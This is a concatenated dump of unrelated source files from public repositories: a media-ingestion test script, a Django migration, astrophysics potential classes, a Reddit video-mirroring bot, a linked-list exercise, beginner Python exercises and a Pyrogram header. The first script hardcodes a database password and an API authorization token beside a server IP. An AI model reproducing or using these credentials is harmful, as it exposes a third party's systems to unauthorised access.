15fa7543b47b6784593debfdb2a8c0b909735180 | 4cef505611a04383310ce6556fac7acb02dbc8a1 | /No ingestion test script/No_ingestion_test_showtime_anytime.py | 3e7aaccddd9211ae1241a17fa2b57af461c79aeb | [] | no_license | Sayan8981/Projectx | 9d8727eec144da35f2acffc787f3c769beef02e1 | bcf93fe885e4cd68bb2c30c408a3b03e785965c3 | refs/heads/master | 2022-03-26T18:13:02.831185 | 2020-01-16T06:52:31 | 2020-01-16T06:52:31 | 187,637,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,357 | py |
"""Writer: Saayan"""
import MySQLdb
import collections
from pprint import pprint
import sys
import csv
import os
import pymysql
import pymongo
import datetime
import sys
import urllib2
import json
import os
from urllib2 import HTTPError
import httplib
import socket
def ingestion():
conn1=pymysql.connect(user="root",passwd="branch@123",host="localhost",db="branch_service")
cur1=conn1.cursor()
result_sheet='/No_ingestion_test_showtime_anytime.csv'
if(os.path.isfile(os.getcwd()+result_sheet)):
os.remove(os.getcwd()+result_sheet)
csv.register_dialect('excel',lineterminator = '\n',skipinitialspace=True,escapechar='')
w=open(os.getcwd()+result_sheet,"wa")
with w as mycsvfile:
fieldnames = ["showtime_id MO","showtime_id SE","showtime_id SM","projectx_id_showtime","Comment"]
writer = csv.DictWriter(mycsvfile,fieldnames=fieldnames,dialect="excel",lineterminator = '\n')
writer.writeheader()
total=0
total1=0
total2=0
query1="select source_program_id,item_type from showtime_anytime_programs where expired=0;"
cur1.execute(query1)
res1=cur1.fetchall()
j=0
k=0
l=0
m=0
n=0
o=0
p=0
q=0
r=0
for i in res1:
print i
showtime_projectx_id=[]
if list(i)!= []:
if i[1]=='movie':
print total,l,j,k
total=total+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=MO" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="MO":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
j=j+1
writer.writerow({"showtime_id MO":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
k=k+1
if len(showtime_projectx_id)==0:
l=l+1
writer.writerow({"showtime_id MO":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id MO:", total ,"No ingestion: ", l, "Multiple mapped content :", j, "Total Fail: ", l+j, "Pass: ", k)
if i[1]=='episode':
total1=total1+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=SE" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="SE":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
q=q+1
writer.writerow({"showtime_id SE":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
r=r+1
if len(showtime_projectx_id)==0:
p=p+1
writer.writerow({"showtime_id SE":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id SE :", total1 ,"No ingestion: ", p, "Multiple mapped content :", q, "Total Fail: ", p+q, "Pass: ", r)
if i[1]=='tv_show':
total2=total2+1
try:
url_showtime="http://34.231.212.186:81/projectx/mappingfromsource?sourceIds=%d&sourceName=ShowtimeAnyTime&showType=SM" %i[0]
response_showtime=urllib2.Request(url_showtime)
response_showtime.add_header('Authorization','Token token=efeb15f572641809acbc0c26c9c1b63f4f7f1fd7dcb68070e45e26f3a40ec8e3')
resp_showtime=urllib2.urlopen(response_showtime)
data_showtime=resp_showtime.read()
data_resp_showtime=json.loads(data_showtime)
except httplib.BadStatusLine:
continue
except urllib2.HTTPError:
continue
except socket.error:
continue
for jj in data_resp_showtime:
if jj["data_source"]=="ShowtimeAnyTime" and jj["type"]=="Program" and jj["sub_type"]=="SM":
showtime_projectx_id.append(jj["projectx_id"])
if len(showtime_projectx_id)>1:
n=n+1
writer.writerow({"showtime_id SM":str(i[0]),"projectx_id_showtime":showtime_projectx_id,"Comment":'Multiple ingestion for same content of Showtime'})
if len(showtime_projectx_id)==1:
o=o+1
if len(showtime_projectx_id)==0:
m=m+1
writer.writerow({"showtime_id SM":str(i[0]),"projectx_id_showtime":'',"Comment":'No Ingestion'})
print("total showtime id SM :", total2 ,"No ingestion: ", m ,"Multiple mapped content :", n, "Total Fail: ", m+n, "Pass: ", o)
print("total showtime id MO:", total ,"No ingestion: ", l, "Multiple mapped content :", j, "Total Fail: ", l+j, "Pass: ", k)
print("total showtime id SE :", total1 ,"No ingestion: ", p, "Multiple mapped content :", q, "Total Fail: ", p+q, "Pass: ", r)
print("total showtime id SM :", total2 ,"No ingestion: ", m ,"Multiple mapped content :", n, "Total Fail: ", m+n, "Pass: ", o)
print("total showtime_anytime id :", total+total1+total2 ,"total No ingestion: ", m+p+l, "Multiple mapped content :", q+n+j, "Total Fail: ", m+p+l+q+n+j, "Pass: ", r+o+k)
print(datetime.datetime.now())
ingestion()
| [
"[email protected]"
] | |
32104a52bb1ffb03bb96243e4787ce2b62d3e161 | a5c57d60e11d6194ab590b43ee61c21dbe9d3675 | /src/bio2bel_drugbank/constants.py | 6fdc1f9a930062c372375cee9a62179b39b507e3 | [
"MIT"
] | permissive | sailfish009/drugbank_bio2bel | 5779365d02b85eecddda5e87358abf3b424464c4 | ccab91aacfa70e362ed25a9343d7dd47d619a26c | refs/heads/master | 2022-02-23T06:20:12.643593 | 2019-10-15T10:28:06 | 2019-10-15T10:28:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | # -*- coding: utf-8 -*-
"""Constants for Bio2BEL DrugBank."""
import os
from bio2bel.utils import get_connection, get_data_dir
VERSION = '0.1.2-dev'
MODULE_NAME = 'drugbank'
DATA_DIR = get_data_dir(MODULE_NAME)
DRUGBANK_URL = 'https://www.drugbank.ca/releases/5-1-4/downloads/all-full-database'
DRUGBANK_PATH = os.path.join(DATA_DIR, 'drugbank_all_full_database.xml.zip')
| [
"[email protected]"
] | |
29c705cad1edefde7a3423ca8e3cb007bcdd5fe8 | 67954fee55a838d3c14ea5758b178f7fddb7d5f7 | /teacher/migrations/0001_initial.py | 3867ed4443a95746325d5ff6c2661d334d11b7ac | [] | no_license | Abel-Fan/student_admin | 899ce1130273fec0905ca4de1fe3c37e6e456b05 | e3c1b96f048273dda20b975917a66dabe97b8851 | refs/heads/master | 2020-06-06T10:17:44.563845 | 2019-06-20T09:54:24 | 2019-06-20T09:54:24 | 192,711,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Generated by Django 2.1.1 on 2019-06-20 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('student', '0002_auto_20190620_1451'),
]
operations = [
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='姓名')),
('project', models.CharField(max_length=20, verbose_name='课程')),
('student_id', models.ManyToManyField(to='student.Student')),
],
),
]
| [
"[email protected]"
] | |
980f6bbb5dc5a2a639e07f041266478030497e29 | 11ada50b47a245278a41b1f2cdae60bc387937da | /gala/potential/potential/builtin/pybuiltin.py | d2a6888e172a89a36bb718859afae3aa8bd2bd42 | [
"MPL-1.1",
"MIT"
] | permissive | ltlancas/gala | 7ec9111e3bf9f49823f393ad08f04aa4c34cf0df | 2621bb599d67e74a85446abf72d5930ef70ca181 | refs/heads/master | 2020-03-25T21:03:56.114744 | 2018-05-12T16:24:46 | 2018-05-12T16:24:46 | 144,157,811 | 1 | 0 | MIT | 2018-08-09T13:40:53 | 2018-08-09T13:40:53 | null | UTF-8 | Python | false | false | 4,211 | py | # coding: utf-8
from __future__ import division, print_function
# Standard library
from collections import OrderedDict
# Third-party
import numpy as np
from ..core import PotentialBase
from ....util import atleast_2d
__all__ = ["HarmonicOscillatorPotential", "KuzminPotential"]
class HarmonicOscillatorPotential(PotentialBase):
r"""
Represents an N-dimensional harmonic oscillator.
.. math::
\Phi = \frac{1}{2}\omega^2 x^2
Parameters
----------
omega : numeric
Frequency.
    units : iterable (optional)
        Unique list of non-reducible units that specify (at minimum) the
length, mass, time, and angle units.
"""
def __init__(self, omega, units=None):
parameters = OrderedDict()
parameters['omega'] = np.atleast_1d(omega)
super(HarmonicOscillatorPotential, self).__init__(units=units,
parameters=parameters,
ndim=len(parameters['omega']))
def _energy(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return np.sum(0.5 * om[None]**2 * q**2, axis=1)
def _gradient(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return om[None]**2 * q
def _hessian(self, q, t=0.):
om = np.atleast_1d(self.parameters['omega'].value)
return np.tile(np.diag(om)[:,:,None], reps=(1,1,q.shape[0]))
def action_angle(self, w):
"""
Transform the input cartesian position and velocity to action-angle
coordinates the Harmonic Oscillator potential. This transformation
is analytic and can be used as a "toy potential" in the
Sanders & Binney 2014 formalism for computing action-angle coordinates
in _any_ potential.
Adapted from Jason Sanders' code
`genfunc <https://github.com/jlsanders/genfunc>`_.
Parameters
----------
w : :class:`gala.dynamics.PhaseSpacePosition`, :class:`gala.dynamics.Orbit`
The positions or orbit to compute the actions, angles, and frequencies at.
"""
from ....dynamics.analyticactionangle import harmonic_oscillator_to_aa
return harmonic_oscillator_to_aa(w, self)
# def phase_space(self, actions, angles):
# """
# Transform the input action-angle coordinates to cartesian position and velocity
# assuming a Harmonic Oscillator potential. This transformation
# is analytic and can be used as a "toy potential" in the
# Sanders & Binney 2014 formalism for computing action-angle coordinates
# in _any_ potential.
# Adapted from Jason Sanders' code
# `genfunc <https://github.com/jlsanders/genfunc>`_.
# Parameters
# ----------
# x : array_like
# Positions.
# v : array_like
# Velocities.
# """
# from ...dynamics.analyticactionangle import harmonic_oscillator_aa_to_xv
# return harmonic_oscillator_aa_to_xv(actions, angles, self)
class KuzminPotential(PotentialBase):
r"""
The Kuzmin flattened disk potential.
.. math::
\Phi = -\frac{Gm}{\sqrt{x^2 + y^2 + (a + |z|)^2}}
Parameters
----------
m : numeric
Mass.
a : numeric
Flattening parameter.
units : iterable
        Unique list of non-reducible units that specify (at minimum) the
length, mass, time, and angle units.
"""
def __init__(self, m, a, units):
parameters = OrderedDict()
parameters['m'] = m
parameters['a'] = a
super(KuzminPotential, self).__init__(units=units,
parameters=parameters)
def _energy(self, q, t):
x,y,z = q
m = self.parameters['m']
a = self.parameters['a']
val = -self.G * m / np.sqrt(x**2 + y**2 + (a + np.abs(z))**2)
return val
def _gradient(self, q, t):
x,y,z = q
m = self.parameters['m']
a = self.parameters['a']
fac = self.G * m / (x**2 + y**2 + (a + np.abs(z))**2)**1.5
return fac[None,...] * q
| [
"[email protected]"
] | |
d86d4bc54409db664185d5391f137bd863fcb162 | 0872e3dc1d71ffc8c6426f77c7d1409fc523e088 | /rlb/main.py | 36d133417ff2b0941b040cf4147dc3629f603b20 | [] | no_license | mpenkov/reddit-liveleak-bot | c0a367f15609e58227f661c99ab6ea17808e0b99 | 4ec35c0a941f269257b6a431cc6de1de8827b3ed | refs/heads/master | 2020-07-21T11:42:21.192096 | 2015-02-07T08:17:48 | 2015-02-07T08:17:48 | 21,909,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,730 | py | import praw
from praw.errors import APIException
import datetime as dt
import os
import os.path as P
import yaml
import logging
import time
#
# http://blog.tplus1.com/blog/2007/09/28/the-python-logging-module-is-much-better-than-print-statements/
#
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
#
# http://stackoverflow.com/questions/11029717/how-do-i-disable-log-messages-from-the-requests-library
#
requests_log = logging.getLogger("requests")
requests_log.setLevel(logging.WARNING)
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
import liveleak
import youtube
from orm import Subreddit, Video
COMMENT_MIRROR = "[**Mirror**](http://www.liveleak.com/view?i=%s)"
COMMENT_FOOTER = """
---
^| [^Feedback](http://www.reddit.com/r/redditliveleakbot/)
^| [^FAQ](http://www.reddit.com/r/redditliveleakbot/wiki/index) ^|"""
def transaction(func):
"""Wrap up a function call as a transaction.
If the transaction succeeds, commit the session.
If something goes wrong, roll the session back.
Returns whatever the inner method returned on success,
or None on failure."""
def inner(self, *args, **kwargs):
try:
ret = func(self, *args, **kwargs)
self.db.commit()
return ret
except Exception as ex:
logger.exception(ex)
self.db.rollback()
return None
return inner
def error_prone_praw_api_call(func):
"""Used to decorate the most error-prone PRAW API calls.
For example, commenting on a submission can fail if the submission has
been deleted."""
def inner(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except APIException as ex:
logger.exception(ex)
return None
return inner
def locate_video(subdir, video_id):
for f in os.listdir(subdir):
if f.startswith(video_id):
return P.join(subdir, f)
class Config(object):
def __init__(self, config_path=None):
if config_path is None:
config_path = P.join(P.dirname(P.abspath(__file__)),
"conf/config.yml")
with open(config_path) as fin:
doc = yaml.load(fin)
self.limit = int(doc["limit"])
self.dest_dir = doc["videopath"]
self.user_agent = doc["user_agent"]
self.liveleak_username = doc["liveleak"]["username"]
self.liveleak_password = doc["liveleak"]["password"]
self.reddit_username = doc["reddit"]["username"]
self.reddit_password = doc["reddit"]["password"]
self.google_developer_key = doc["google_developer_key"]
self.hold_hours = doc["hold_hours"]
self.subreddits = {}
for sub in doc["subreddits"]:
self.subreddits[sub] = doc["subreddits"][sub]["liveleak_category"]
self.dbpath = doc["dbpath"]
class Bot(object):
def __init__(self, config_path=None):
self.cfg = Config(config_path)
if not P.isdir(self.cfg.dest_dir):
os.makedirs(self.cfg.dest_dir)
engine = create_engine(self.cfg.dbpath)
Session = sessionmaker(bind=engine)
self.db = Session()
self.r = praw.Reddit(self.cfg.user_agent)
self.r.login(self.cfg.reddit_username, self.cfg.reddit_password)
self.uploader = liveleak.Uploader(self.cfg.user_agent)
self.uploader.login(self.cfg.liveleak_username,
self.cfg.liveleak_password)
def monitor(self):
"""Monitor all subreddits specified in the config.xml file."""
for subreddit in self.cfg.subreddits:
self.download_new_videos(subreddit)
self.monitor_deleted_videos()
self.make_stale()
@transaction
def get_subreddit_info(self, sr):
try:
sub_info = self.db.query(Subreddit).filter_by(id=sr).one()
except NoResultFound:
sub_info = Subreddit(id=sr)
self.db.add(sub_info)
return sub_info
def download_new_videos(self, subreddit):
"""Monitors the specific subreddit for new submissions that
link to YouTube videos."""
meth_name = "download_new_videos"
sub_info = self.get_subreddit_info(subreddit)
now = dt.datetime.now()
for new_submission in self.r.get_subreddit(
subreddit).get_new(limit=self.cfg.limit):
created = dt.datetime.fromtimestamp(new_submission.created_utc)
if created < sub_info.mostRecentSubmission:
break
youtube_id = youtube.extract_id(new_submission.url)
logger.debug("%s: youtube_id: %s", meth_name, youtube_id)
if youtube_id is None:
logger.debug("skipping submission URL: %s",
new_submission.url)
continue
logger.info("%s: new video submission: %s %s %s", meth_name,
new_submission.permalink, new_submission.url,
youtube_id)
download = True
try:
v = self.db.query(Video).filter_by(youtubeId=youtube_id).one()
download = not v.has_file()
except NoResultFound:
pass
if download:
self.download_video(youtube_id, new_submission.permalink)
sub_info.mostRecentSubmission = now
self.db.commit()
@transaction
def download_video(self, youtube_id, permalink):
"""Download the video with the specified YouTube ID.
If it has already been downloaded, the actual download is skipped.
Returns a Video instance.
"""
try:
v = self.db.query(Video).filter_by(youtubeId=youtube_id).one()
except NoResultFound:
v = Video(youtube_id, permalink)
self.db.add(v)
v.localPath = locate_video(self.cfg.dest_dir, v.youtubeId)
if v.localPath is None:
youtube.download(self.cfg.dest_dir, v.youtubeId)
v.localPath = locate_video(self.cfg.dest_dir, v.youtubeId)
if v.localPath is None:
v.state = Video.ERROR
else:
v.state = Video.DOWNLOADED
v.downloaded = dt.datetime.now()
v.localModified = dt.datetime.now()
return v
@transaction
def make_stale(self):
"""Make all data that hasn't been updated in self.hold_hours
hours stale."""
cutoff = dt.datetime.now() - dt.timedelta(hours=self.cfg.hold_hours)
for video in self.db.query(Video).filter_by(state=Video.DOWNLOADED):
if video.discovered is None or video.discovered < cutoff:
video.state = Video.STALE
video.localModified = dt.datetime.now()
def purge(self):
"""Delete stale and reposted video data."""
for video in self.db.query(Video).filter_by(state=Video.STALE):
self.purge_video(video)
for video in self.db.query(Video).filter_by(state=Video.REPOSTED):
self.purge_video(video)
for video in self.db.query(Video):
if not video.has_file():
self.purge_video(video)
@transaction
def purge_video(self, video):
if video.has_file():
logger.info("removing %s", video.localPath)
try:
os.remove(video.localPath)
except OSError as ose:
logger.exception(ose)
video.localPath = None
video.state = Video.PURGED
video.localModified = dt.datetime.now()
@transaction
def repost_video(self, video):
meth_name = "repost_video"
submission = self.r.get_submission(video.redditSubmissionPermalink)
subreddit = submission.subreddit.display_name
body = "repost of http://youtube.com/watch?v=%s from %s" % (
video.youtubeId, submission.permalink)
logger.info("%s: %s", meth_name, body)
if not video.has_file():
#
# If we're reposting, then the video has already been deleted from
# YouTube. If we don't have the video downloaded by now, there's
# nothing we can do.
#
logger.info("%s: giving up on %s", meth_name, video.youtubeId)
video.state = Video.STALE
elif video.liveleakId is None:
category = self.cfg.subreddits[subreddit]
logger.debug("%s: category: %s", meth_name, category)
file_token, connection = self.uploader.upload(video.localPath)
video.liveleakId = self.uploader.publish(submission.title, body,
subreddit, category,
connection)
video.state = Video.REPOSTED
def check_replies(self, submission):
"""Return true if we've replied to the submission already.
Ideally, we shouldn't have to check for this over the wire, since
our database should be sufficient. However, it avoids embarrassing
multi-posts in some cases, e.g. database has been reset."""
meth_name = "check_replies"
reply_authors = [r.author.name for r in submission.comments
if r.author]
result = self.cfg.reddit_username in reply_authors
if result:
logger.info("%s: we have already replied to this submission: %s",
meth_name, submission.permalink)
return result
def monitor_deleted_videos(self):
"""Go through all our downloaded videos and check if they have
been deleted from YouTube. If yes, repost them."""
for v in self.db.query(Video).filter_by(state=Video.DOWNLOADED):
try:
if youtube.video_exists(v.youtubeId, self.cfg.user_agent,
self.cfg.google_developer_key):
continue
except youtube.YoutubeException:
time.sleep(5)
continue
submission = self.r.get_submission(v.redditSubmissionPermalink)
if self.check_replies(submission):
continue
self.repost_video(v)
if v.liveleakId is None:
continue
self.post_comment(submission, v.liveleakId)
v.deleted = dt.datetime.now()
self.db.commit()
@error_prone_praw_api_call
def post_comment(self, submission, liveleak_id):
comment = (COMMENT_MIRROR % liveleak_id) + COMMENT_FOOTER
submission.add_comment(comment)
| [
"[email protected]"
] | |
abd0e4369ed4686d8a57e4903580a0d3336d78b0 | 7e98a8b31cc2fecf8384f4590f27540f7280659a | /v1/LinkedLists/mirror_subtraction.py | b9bf4ac6f787e73961c467e99aa83d9e78408879 | [] | no_license | darraes/coding_questions | 62a07a6ede884fd0e3596f3dac8f50e11fd8676e | 70dcc3b859db673c39c3cf55aeb463d2bd822ed9 | refs/heads/master | 2021-01-21T07:21:18.033321 | 2020-06-15T16:25:11 | 2020-06-15T16:25:11 | 91,611,595 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | # http://www.careercup.com/question?id=5657550909341696
class Node:
def __init__(self, next, value):
self._next = next
self._value = value
def revert(node):
    # Recursively reverse the list; returns (new_tail, new_head).
    if node == None: raise
elif node._next == None:
return (node, node)
else:
tail, head = revert(node._next)
tail._next = node
node._next = None
return (node, head)
def solve(node):
    # Find the middle with slow/fast pointers, reverse the second half,
    # subtract it element-wise from the first half (the "mirror"), then
    # restore the second half's order and reattach it.
    slow = fast = firstHalf = node
    secondHalf = None
while slow._next != None:
if fast._next == None or fast._next._next == None:
secondHalf = slow._next
slow._next = None
break
else:
slow = slow._next
fast = fast._next._next
headF = firstHalf
tailF = slow
tail, secondHalf = revert(secondHalf)
headS = secondHalf
while firstHalf != None:
if secondHalf != None:
firstHalf._value -= secondHalf._value
secondHalf = secondHalf._next
else:
firstHalf._value = 0
firstHalf = firstHalf._next
tail, headS = revert(headS)
tailF._next = headS
return headF
head = Node(Node(Node(Node(Node(None, 10), 5), 4), 9), 10)
new = solve(head) | [
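# Added for illustration: walk the returned list and print the node values.
node = new
while node:
    print(node._value)
    node = node._next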
"[email protected]"
] | |
b006e071b4eedcdff17cc409c2ad17895603ea12 | 4342ef8afa6a0790690f711d28c0ce2c78711c67 | /seed_database.py | 921aa0c13ce449678e4383c184f066f8bd5a1fa0 | [] | no_license | christinababaya/ratings-v2 | fe03413af9042942204aa69980a3ce2415411c14 | 2812bc1493607fb4f04b62c1e84b4d9efb396937 | refs/heads/master | 2023-03-25T20:39:38.191009 | 2021-03-26T16:00:14 | 2021-03-26T16:00:14 | 351,493,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | import os
import json
from random import choice, randint
from datetime import datetime
import crud
import model
import server
os.system('dropdb ratings')
os.system('createdb ratings')
model.connect_to_db(server.app)
model.db.create_all()
with open('data/movies.json') as f:
movie_data = json.loads(f.read())
movies_in_db=[]
for movie in movie_data:
title, overview, poster_path= movie['title'], movie['overview'],movie['poster_path']
release_date = datetime.strptime(movie['release_date'], '%Y-%m-%d')
db_movie= crud.create_movie(title, overview, release_date, poster_path)
movies_in_db.append(db_movie)
for n in range(10):
email = f'user{n}@test.com'
password= 'test'
user = crud.create_user(email, password)
for _ in range(10):
random_movie= choice(movies_in_db)
score= randint(1,5)
crud.create_rating(user, random_movie, score) | [
"[email protected]"
] | |
44019f8e0054c62342b61280690b6ff62aac80ff | 8b576f16cfd9202f756611001e684657dde3e812 | /03_TryExcept/venv/Scripts/pip3.7-script.py | 68fc52157e004291293a7e15bf0d026173449d4c | [] | no_license | WenhaoChen0907/Python_Demo | 26cc4d120aaa990c2d26fd518dfe6bcb622b1d77 | 136b8ced40623b0970c2a5bd47852425dcac3e86 | refs/heads/master | 2023-02-23T23:58:09.584321 | 2021-01-30T11:49:50 | 2021-01-30T11:49:50 | 334,374,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | #!E:\python-pycharm\03_TryExcept\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"[email protected]"
] | |
92ec7ed041e603e068af5792813e85378c4cca01 | 9d454ae0d5dd1d7e96e904ced80ca502019bb659 | /1720_decode.py | 8f1c93438180b711a3300877bb9f7e9cc36a7969 | [] | no_license | zzz686970/leetcode-2018 | dad2c3db3b6360662a90ea709e58d7facec5c797 | 16e4343922041929bc3021e152093425066620bb | refs/heads/master | 2021-08-18T08:11:10.153394 | 2021-07-22T15:58:52 | 2021-07-22T15:58:52 | 135,581,395 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | class Solution:
def decode(self, encoded: List[int], first: int) -> List[int]:
# ans = [first]
# for el in encoded:
# ans.append(el ^ ans[-1])
# return ans
return list(accumulate([first] + encoded, lambda x, y: x ^ y)) | [
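# Illustrative check (example values added here, not part of the original
# solution): decoding is a running XOR prefix, so encoded=[1, 2, 3] with
# first=1 yields [1, 1^1, 0^2, 2^3] == [1, 0, 2, 1].
if __name__ == "__main__":
    assert Solution().decode([1, 2, 3], 1) == [1, 0, 2, 1]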
"[email protected]"
] | |
280e83ef0782347a3afd107ead0084773b84c6ae | aa8af4dc70c14339a05489b0c4c4925d7a00e319 | /starbox_custom/starbox_custom/doctype/store/test_store.py | 908d6e2311d2d1c252d713c5f8fb6e7b22ab9769 | [
"MIT"
] | permissive | vhrspvl/starbox-custom | 925768540b318ee923dd6587291fbece003fd17e | 0d1143e64119cff66ad52fbe8453fa7281b62998 | refs/heads/master | 2021-05-13T21:35:17.327744 | 2019-07-24T16:11:50 | 2019-07-24T16:11:50 | 116,466,334 | 0 | 2 | null | 2018-08-13T15:05:27 | 2018-01-06T08:15:26 | Python | UTF-8 | Python | false | false | 217 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Starboxes India and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStoreKeeper(unittest.TestCase):
pass
| [
"[email protected]"
] | |
01040de6b5d4ea3274ea3ea17e71b4643c1b4001 | b483c598fa375e9af02348960f210b9f482bd655 | /cursoemvideo/desafios/Desafio075.py | 48338306d4a75934c3af6b61e07b9ea8b5210c04 | [
"MIT"
] | permissive | brunofonsousa/python | 6f766d08bf193180ea9a4903cb93ffd167db588d | 8f2f26c77015c0baaa76174e004406b4115272c7 | refs/heads/master | 2022-09-30T14:58:01.080749 | 2020-06-08T09:55:35 | 2020-06-08T09:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,504 | py | '''
Exercício Python 075: Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. No final, mostre:
A) Quantas vezes apareceu o valor 9.
B) Em que posição foi digitado o primeiro valor 3.
C) Quais foram os números pares.
'''
## VERSÃO GUANABARA:
num = (int(input("Digite um número: ")),
int(input("Digite outro número: ")),
int(input("Digite mais um número: ")),
int(input("Digite o último número: ")))
print(f"O valor 9 apareceu {num.count(9)} vezes")
if 3 in num:
print(f"O valor 3 apareceu na {num.index(3)+1}ª posição")
else:
print("O valor 3 não foi digitado em nenhuma posição")
print(f"Os valores pares digitados foram ", end="")
for n in num:
if n % 2 == 0:
print(n, end=" ")
else:
pass
## BRUNO'S VERSION:
varia = ['um', 'outro', 'mais um', 'último']
tupla=()
for i in range(4):
num = int(input(f"Digite {varia[i]} número: "))
tupla = tupla + (num,)
print("Você digitou os valores:", (tupla))
vezes = 0
for i in range(len(tupla)):
#x = tupla.count(tupla[i])
x = tupla[i]
if x == 9:
vezes += 1
else:
pass
for i in range(len(tupla)):
if tupla[i] == 3:
primeiro = i
break
else:
pass
par = 0
for i in tupla:
if i % 2 == 0:
par += 1
else:
pass
print(f"O valor 9 apareceu {vezes} vezes")
print(f"O valor 3 apareceu na {primeiro}ª posição")
print(f"Os valores pares digitados foram {par}")
| [
"[email protected]"
] | |
42578ba3422cde2aa409b7883dec36b75c62a800 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/f8586ba81c1349918117ff21ab2d5b5e.py | 48a969f886f37d77fddd9072875bff7e3adeb896 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 95 | py | #!/usr/bin/env python
def is_leap_year(y):
return y%400 == 0 or (y%4 == 0 and y%100 != 0)
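# Quick self-check (illustrative values added here): 2000 and 2016 are leap
# years, 1900 and 2015 are not.
if __name__ == '__main__':
    assert is_leap_year(2000)
    assert is_leap_year(2016)
    assert not is_leap_year(1900)
    assert not is_leap_year(2015)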
| [
"[email protected]"
] | |
e966f04e9525fb6b367303324e44fbcbcfcfae94 | 221b2221703f9cddeee7054c5dc426b81a3f53bd | /venv/lib/python3.9/site-packages/pyrogram/raw/functions/langpack/get_language.py | e88bc93e119755902d6020efd7ffc9cf8d817575 | [] | no_license | ch3p4ll3/Royal-Racing-Bot | 37c998a650078e4b5f5c3b34b8c081d52b018944 | eab5baf61a9782fbedd42ddf35b7e11cbae9ec22 | refs/heads/main | 2023-06-26T03:34:58.104068 | 2021-07-30T17:36:14 | 2021-07-30T17:36:14 | 348,089,837 | 1 | 0 | null | 2021-03-20T11:32:46 | 2021-03-15T18:59:39 | Python | UTF-8 | Python | false | false | 2,400 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2021 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
